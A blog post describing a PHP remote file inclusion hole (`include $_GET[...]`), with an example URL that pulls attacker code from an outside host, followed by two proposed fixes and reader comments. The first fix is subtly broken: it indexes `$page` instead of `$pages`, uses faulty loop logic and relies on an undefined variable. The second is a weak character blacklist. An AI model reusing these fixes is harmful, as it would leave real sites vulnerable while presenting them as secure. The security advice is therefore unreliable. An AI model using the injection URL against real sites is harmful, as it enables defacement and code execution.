URL Injection / Hacking website / Taking control / {PHP}

You never know a thing when it really happens to yourself. One of my client site got hacked because of url injection. The problem was that deep inside the page there was a line :

include $_GET[“somebloodyfile”];

 A novice hacker could write something in the url like : mypage?somebloodyfile=http://domain2/code.txt

and in the http://domain2/code.txt he/she can have a message showing : Hacked by a bloody hacker. So whats the solution.

Here is how it should be done. 

Complicated Way to solve:

… html header …

<?php
//list of valid pages
$pages=array(“games/index.html”, “news/news.html”, “games/1.html”);

//check $page variable
$valid=false;
for ($i=0; $i<sizeof($pages) || !$valid; $i++) {
 if ($page==$page[$i]) {
  $valid=true;
 }
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

… html footer …

 

 Alternate but easy way:

… html header …

<?php
    $invalidChars=array(“/”,”.”,”
\\”,”\””,”;”,”http“,”:”,”!”,”*”,”&”);
   $page=str_replace($invalidChars,””,$page);
   include (“pages/”.$page.”.html”);
?>

… html footer …

Advertisements

6 thoughts on “URL Injection / Hacking website / Taking control / {PHP}

  1. I think it is not recommended to use $_GET for including..

    that is in my opinion too dangerous but yeah.. this workaround will do it too 😉

    greets

  2. You could also scan the dir and put each file in a directory in an array and then take out the “.” and the “..” in the array and then check if the webpage is on one of the webpages in the array. This is a whole lot more secure from what I would have to say.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s